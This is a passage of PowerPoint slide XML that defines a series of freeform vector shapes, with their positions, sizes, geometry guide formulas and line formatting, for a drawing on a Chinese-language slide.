        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1059" name="Freeform 32"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="438" y="3229"/>
              <a:ext cx="462" cy="251"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1386"/>
                <a:gd name="T1" fmla="*/ 1 h 753"/>
                <a:gd name="T2" fmla="*/ 0 w 1386"/>
                <a:gd name="T3" fmla="*/ 0 h 753"/>
                <a:gd name="T4" fmla="*/ 1 w 1386"/>
                <a:gd name="T5" fmla="*/ 0 h 753"/>
                <a:gd name="T6" fmla="*/ 1 w 1386"/>
                <a:gd name="T7" fmla="*/ 0 h 753"/>
                <a:gd name="T8" fmla="*/ 2 w 1386"/>
                <a:gd name="T9" fmla="*/ 0 h 753"/>
                <a:gd name="T10" fmla="*/ 2 w 1386"/>
                <a:gd name="T11" fmla="*/ 0 h 753"/>
                <a:gd name="T12" fmla="*/ 2 w 1386"/>
                <a:gd name="T13" fmla="*/ 1 h 753"/>
                <a:gd name="T14" fmla="*/ 6 w 1386"/>
                <a:gd name="T15" fmla="*/ 3 h 753"/>
                <a:gd name="T16" fmla="*/ 6 w 1386"/>
                <a:gd name="T17" fmla="*/ 3 h 753"/>
                <a:gd name="T18" fmla="*/ 2 w 1386"/>
                <a:gd name="T19" fmla="*/ 1 h 753"/>
                <a:gd name="T20" fmla="*/ 1 w 1386"/>
                <a:gd name="T21" fmla="*/ 2 h 753"/>
                <a:gd name="T22" fmla="*/ 0 w 1386"/>
                <a:gd name="T23" fmla="*/ 1 h 753"/>
                <a:gd name="T24" fmla="*/ 0 w 1386"/>
                <a:gd name="T25" fmla="*/ 1 h 753"/>
                <a:gd name="T26" fmla="*/ 0 w 1386"/>
                <a:gd name="T27" fmla="*/ 1 h 753"/>
                <a:gd name="T28" fmla="*/ 0 w 1386"/>
                <a:gd name="T29" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1060" name="Freeform 33"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="452" y="3236"/>
              <a:ext cx="450" cy="246"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1351"/>
                <a:gd name="T1" fmla="*/ 0 h 740"/>
                <a:gd name="T2" fmla="*/ 1 w 1351"/>
                <a:gd name="T3" fmla="*/ 0 h 740"/>
                <a:gd name="T4" fmla="*/ 1 w 1351"/>
                <a:gd name="T5" fmla="*/ 0 h 740"/>
                <a:gd name="T6" fmla="*/ 1 w 1351"/>
                <a:gd name="T7" fmla="*/ 0 h 740"/>
                <a:gd name="T8" fmla="*/ 1 w 1351"/>
                <a:gd name="T9" fmla="*/ 0 h 740"/>
                <a:gd name="T10" fmla="*/ 2 w 1351"/>
                <a:gd name="T11" fmla="*/ 0 h 740"/>
                <a:gd name="T12" fmla="*/ 2 w 1351"/>
                <a:gd name="T13" fmla="*/ 1 h 740"/>
                <a:gd name="T14" fmla="*/ 6 w 1351"/>
                <a:gd name="T15" fmla="*/ 3 h 740"/>
                <a:gd name="T16" fmla="*/ 5 w 1351"/>
                <a:gd name="T17" fmla="*/ 3 h 740"/>
                <a:gd name="T18" fmla="*/ 1 w 1351"/>
                <a:gd name="T19" fmla="*/ 1 h 740"/>
                <a:gd name="T20" fmla="*/ 1 w 1351"/>
                <a:gd name="T21" fmla="*/ 2 h 740"/>
                <a:gd name="T22" fmla="*/ 0 w 1351"/>
                <a:gd name="T23" fmla="*/ 1 h 740"/>
                <a:gd name="T24" fmla="*/ 0 w 1351"/>
                <a:gd name="T25" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1061" name="Freeform 34"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="799" y="3709"/>
              <a:ext cx="326" cy="31"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 980"/>
                <a:gd name="T1" fmla="*/ 0 h 93"/>
                <a:gd name="T2" fmla="*/ 4 w 980"/>
                <a:gd name="T3" fmla="*/ 0 h 93"/>
                <a:gd name="T4" fmla="*/ 3 w 980"/>
                <a:gd name="T5" fmla="*/ 0 h 93"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1062" name="Freeform 35"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="760" y="3028"/>
              <a:ext cx="740" cy="702"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 2219"/>
                <a:gd name="T1" fmla="*/ 6 h 2108"/>
                <a:gd name="T2" fmla="*/ 1 w 2219"/>
                <a:gd name="T3" fmla="*/ 7 h 2108"/>
                <a:gd name="T4" fmla="*/ 1 w 2219"/>
                <a:gd name="T5" fmla="*/ 7 h 2108"/>
                <a:gd name="T6" fmla="*/ 2 w 2219"/>
                <a:gd name="T7" fmla="*/ 7 h 2108"/>
                <a:gd name="T8" fmla="*/ 0 w 2219"/>
                <a:gd name="T9" fmla="*/ 7 h 2108"/>
                <a:gd name="T10" fmla="*/ 1 w 2219"/>
                <a:gd name="T11" fmla="*/ 8 h 2108"/>
                <a:gd name="T12" fmla="*/ 2 w 2219"/>
                <a:gd name="T13" fmla="*/ 8 h 2108"/>
                <a:gd name="T14" fmla="*/ 3 w 2219"/>
                <a:gd name="T15" fmla="*/ 8 h 2108"/>
                <a:gd name="T16" fmla="*/ 4 w 2219"/>
                <a:gd name="T17" fmla="*/ 8 h 2108"/>
                <a:gd name="T18" fmla="*/ 6 w 2219"/>
                <a:gd name="T19" fmla="*/ 9 h 2108"/>
                <a:gd name="T20" fmla="*/ 7 w 2219"/>
                <a:gd name="T21" fmla="*/ 9 h 2108"/>
                <a:gd name="T22" fmla="*/ 8 w 2219"/>
                <a:gd name="T23" fmla="*/ 8 h 2108"/>
                <a:gd name="T24" fmla="*/ 8 w 2219"/>
                <a:gd name="T25" fmla="*/ 8 h 2108"/>
                <a:gd name="T26" fmla="*/ 9 w 2219"/>
                <a:gd name="T27" fmla="*/ 5 h 2108"/>
                <a:gd name="T28" fmla="*/ 9 w 2219"/>
                <a:gd name="T29" fmla="*/ 4 h 2108"/>
                <a:gd name="T30" fmla="*/ 9 w 2219"/>
                <a:gd name="T31" fmla="*/ 3 h 2108"/>
                <a:gd name="T32" fmla="*/ 9 w 2219"/>
                <a:gd name="T33" fmla="*/ 0 h 2108"/>
                <a:gd name="T34" fmla="*/ 9 w 2219"/>
                <a:gd name="T35" fmla="*/ 1 h 2108"/>
                <a:gd name="T36" fmla="*/ 7 w 2219"/>
                <a:gd name="T37" fmla="*/ 6 h 2108"/>
                <a:gd name="T38" fmla="*/ 7 w 2219"/>
                <a:gd name="T39" fmla="*/ 6 h 2108"/>
                <a:gd name="T40" fmla="*/ 7 w 2219"/>
                <a:gd name="T41" fmla="*/ 5 h 2108"/>
                <a:gd name="T42" fmla="*/ 7 w 2219"/>
                <a:gd name="T43" fmla="*/ 4 h 2108"/>
                <a:gd name="T44" fmla="*/ 7 w 2219"/>
                <a:gd name="T45" fmla="*/ 5 h 2108"/>
                <a:gd name="T46" fmla="*/ 6 w 2219"/>
                <a:gd name="T47" fmla="*/ 6 h 2108"/>
                <a:gd name="T48" fmla="*/ 5 w 2219"/>
                <a:gd name="T49" fmla="*/ 7 h 2108"/>
                <a:gd name="T50" fmla="*/ 4 w 2219"/>
                <a:gd name="T51" fmla="*/ 7 h 2108"/>
                <a:gd name="T52" fmla="*/ 2 w 2219"/>
                <a:gd name="T53" fmla="*/ 7 h 2108"/>
                <a:gd name="T54" fmla="*/ 1 w 2219"/>
                <a:gd name="T55" fmla="*/ 7 h 2108"/>
                <a:gd name="T56" fmla="*/ 1 w 2219"/>
                <a:gd name="T57" fmla="*/ 6 h 2108"/>
                <a:gd name="T58" fmla="*/ 1 w 2219"/>
                <a:gd name="T59" fmla="*/ 6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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1063" name="Freeform 36"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="498" y="3790"/>
              <a:ext cx="1052" cy="157"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 3155"/>
                <a:gd name="T1" fmla="*/ 1 h 470"/>
                <a:gd name="T2" fmla="*/ 12 w 3155"/>
                <a:gd name="T3" fmla="*/ 1 h 470"/>
                <a:gd name="T4" fmla="*/ 12 w 3155"/>
                <a:gd name="T5" fmla="*/ 1 h 470"/>
                <a:gd name="T6" fmla="*/ 13 w 3155"/>
                <a:gd name="T7" fmla="*/ 0 h 470"/>
                <a:gd name="T8" fmla="*/ 13 w 3155"/>
                <a:gd name="T9" fmla="*/ 2 h 470"/>
                <a:gd name="T10" fmla="*/ 12 w 3155"/>
                <a:gd name="T11" fmla="*/ 2 h 470"/>
                <a:gd name="T12" fmla="*/ 1 w 3155"/>
                <a:gd name="T13" fmla="*/ 1 h 470"/>
                <a:gd name="T14" fmla="*/ 0 w 3155"/>
                <a:gd name="T15" fmla="*/ 1 h 470"/>
                <a:gd name="T16" fmla="*/ 0 w 3155"/>
                <a:gd name="T17" fmla="*/ 1 h 470"/>
                <a:gd name="T18" fmla="*/ 0 w 3155"/>
                <a:gd name="T19" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1064" name="Freeform 37"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="828" y="3757"/>
              <a:ext cx="63" cy="31"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 188"/>
                <a:gd name="T1" fmla="*/ 0 h 93"/>
                <a:gd name="T2" fmla="*/ 0 w 188"/>
                <a:gd name="T3" fmla="*/ 0 h 93"/>
                <a:gd name="T4" fmla="*/ 0 w 188"/>
                <a:gd name="T5" fmla="*/ 0 h 93"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1065" name="Freeform 38"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="924" y="3762"/>
              <a:ext cx="60" cy="33"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 182"/>
                <a:gd name="T1" fmla="*/ 0 h 98"/>
                <a:gd name="T2" fmla="*/ 0 w 182"/>
                <a:gd name="T3" fmla="*/ 0 h 98"/>
                <a:gd name="T4" fmla="*/ 0 w 182"/>
                <a:gd name="T5" fmla="*/ 0 h 98"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1066" name="Freeform 39"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1033" y="3765"/>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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1067" name="Freeform 40"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1134" y="3770"/>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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068" name="Freeform 41"/>
            <p:cNvSpPr>
              <a:spLocks/>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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1069" name="Freeform 42"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="967" y="3801"/>
              <a:ext cx="62" cy="32"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 188"/>
                <a:gd name="T1" fmla="*/ 0 h 94"/>
                <a:gd name="T2" fmla="*/ 0 w 188"/>
                <a:gd name="T3" fmla="*/ 0 h 94"/>
                <a:gd name="T4" fmla="*/ 0 w 188"/>
                <a:gd name="T5" fmla="*/ 0 h 94"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1070" name="Freeform 43"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1062" y="3807"/>
              <a:ext cx="61" cy="33"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 182"/>
                <a:gd name="T1" fmla="*/ 0 h 97"/>
                <a:gd name="T2" fmla="*/ 0 w 182"/>
                <a:gd name="T3" fmla="*/ 0 h 97"/>
                <a:gd name="T4" fmla="*/ 0 w 182"/>
                <a:gd name="T5" fmla="*/ 0 h 97"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1071" name="Freeform 44"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1171" y="3810"/>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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1072" name="Freeform 45"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1272" y="3814"/>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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1073" name="Freeform 46"/>
            <p:cNvSpPr>
              <a:spLocks/>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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1074" name="Freeform 47"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="652" y="3823"/>
              <a:ext cx="72" cy="36"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 216"/>
                <a:gd name="T1" fmla="*/ 0 h 108"/>
                <a:gd name="T2" fmla="*/ 0 w 216"/>
                <a:gd name="T3" fmla="*/ 0 h 108"/>
                <a:gd name="T4" fmla="*/ 0 w 216"/>
                <a:gd name="T5" fmla="*/ 0 h 108"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1075" name="Freeform 48"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762" y="3830"/>
              <a:ext cx="71" cy="38"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212"/>
                <a:gd name="T1" fmla="*/ 0 h 113"/>
                <a:gd name="T2" fmla="*/ 0 w 212"/>
                <a:gd name="T3" fmla="*/ 0 h 113"/>
                <a:gd name="T4" fmla="*/ 0 w 212"/>
                <a:gd name="T5" fmla="*/ 0 h 113"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1076" name="Freeform 49"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="888" y="3833"/>
              <a:ext cx="61" cy="43"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 184"/>
                <a:gd name="T1" fmla="*/ 0 h 128"/>
                <a:gd name="T2" fmla="*/ 0 w 184"/>
                <a:gd name="T3" fmla="*/ 0 h 128"/>
                <a:gd name="T4" fmla="*/ 0 w 184"/>
                <a:gd name="T5" fmla="*/ 1 h 128"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1077" name="Freeform 50"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1005" y="3838"/>
              <a:ext cx="50" cy="42"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 151"/>
                <a:gd name="T1" fmla="*/ 0 h 126"/>
                <a:gd name="T2" fmla="*/ 0 w 151"/>
                <a:gd name="T3" fmla="*/ 0 h 126"/>
                <a:gd name="T4" fmla="*/ 0 w 151"/>
                <a:gd name="T5" fmla="*/ 1 h 126"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1078" name="Freeform 51"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1131" y="3849"/>
              <a:ext cx="46" cy="33"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 138"/>
                <a:gd name="T1" fmla="*/ 0 h 97"/>
                <a:gd name="T2" fmla="*/ 0 w 138"/>
                <a:gd name="T3" fmla="*/ 0 h 97"/>
                <a:gd name="T4" fmla="*/ 0 w 138"/>
                <a:gd name="T5" fmla="*/ 0 h 97"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1079" name="Freeform 52"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="758" y="3054"/>
              <a:ext cx="89" cy="99"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 267"/>
                <a:gd name="T1" fmla="*/ 1 h 295"/>
                <a:gd name="T2" fmla="*/ 0 w 267"/>
                <a:gd name="T3" fmla="*/ 0 h 295"/>
                <a:gd name="T4" fmla="*/ 1 w 267"/>
                <a:gd name="T5" fmla="*/ 0 h 295"/>
                <a:gd name="T6" fmla="*/ 1 w 267"/>
                <a:gd name="T7" fmla="*/ 0 h 295"/>
                <a:gd name="T8" fmla="*/ 1 w 267"/>
                <a:gd name="T9" fmla="*/ 0 h 295"/>
                <a:gd name="T10" fmla="*/ 0 w 267"/>
                <a:gd name="T11" fmla="*/ 1 h 295"/>
                <a:gd name="T12" fmla="*/ 0 w 267"/>
                <a:gd name="T13" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1080" name="Freeform 53"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1267" y="3044"/>
              <a:ext cx="108" cy="128"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 324"/>
                <a:gd name="T1" fmla="*/ 0 h 383"/>
                <a:gd name="T2" fmla="*/ 1 w 324"/>
                <a:gd name="T3" fmla="*/ 0 h 383"/>
                <a:gd name="T4" fmla="*/ 1 w 324"/>
                <a:gd name="T5" fmla="*/ 0 h 383"/>
                <a:gd name="T6" fmla="*/ 1 w 324"/>
                <a:gd name="T7" fmla="*/ 2 h 383"/>
                <a:gd name="T8" fmla="*/ 1 w 324"/>
                <a:gd name="T9" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1081" name="Freeform 54"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="820" y="3278"/>
              <a:ext cx="490" cy="315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 1471"/>
                <a:gd name="T1" fmla="*/ 2 h 944"/>
                <a:gd name="T2" fmla="*/ 1 w 1471"/>
                <a:gd name="T3" fmla="*/ 3 h 944"/>
                <a:gd name="T4" fmla="*/ 1 w 1471"/>
                <a:gd name="T5" fmla="*/ 3 h 944"/>
                <a:gd name="T6" fmla="*/ 1 w 1471"/>
                <a:gd name="T7" fmla="*/ 3 h 944"/>
                <a:gd name="T8" fmla="*/ 0 w 1471"/>
                <a:gd name="T9" fmla="*/ 3 h 944"/>
                <a:gd name="T10" fmla="*/ 1 w 1471"/>
                <a:gd name="T11" fmla="*/ 3 h 944"/>
                <a:gd name="T12" fmla="*/ 2 w 1471"/>
                <a:gd name="T13" fmla="*/ 4 h 944"/>
                <a:gd name="T14" fmla="*/ 4 w 1471"/>
                <a:gd name="T15" fmla="*/ 4 h 944"/>
                <a:gd name="T16" fmla="*/ 5 w 1471"/>
                <a:gd name="T17" fmla="*/ 3 h 944"/>
                <a:gd name="T18" fmla="*/ 6 w 1471"/>
                <a:gd name="T19" fmla="*/ 3 h 944"/>
                <a:gd name="T20" fmla="*/ 6 w 1471"/>
                <a:gd name="T21" fmla="*/ 2 h 944"/>
                <a:gd name="T22" fmla="*/ 6 w 1471"/>
                <a:gd name="T23" fmla="*/ 1 h 944"/>
                <a:gd name="T24" fmla="*/ 6 w 1471"/>
                <a:gd name="T25" fmla="*/ 0 h 944"/>
                <a:gd name="T26" fmla="*/ 6 w 1471"/>
                <a:gd name="T27" fmla="*/ 1 h 944"/>
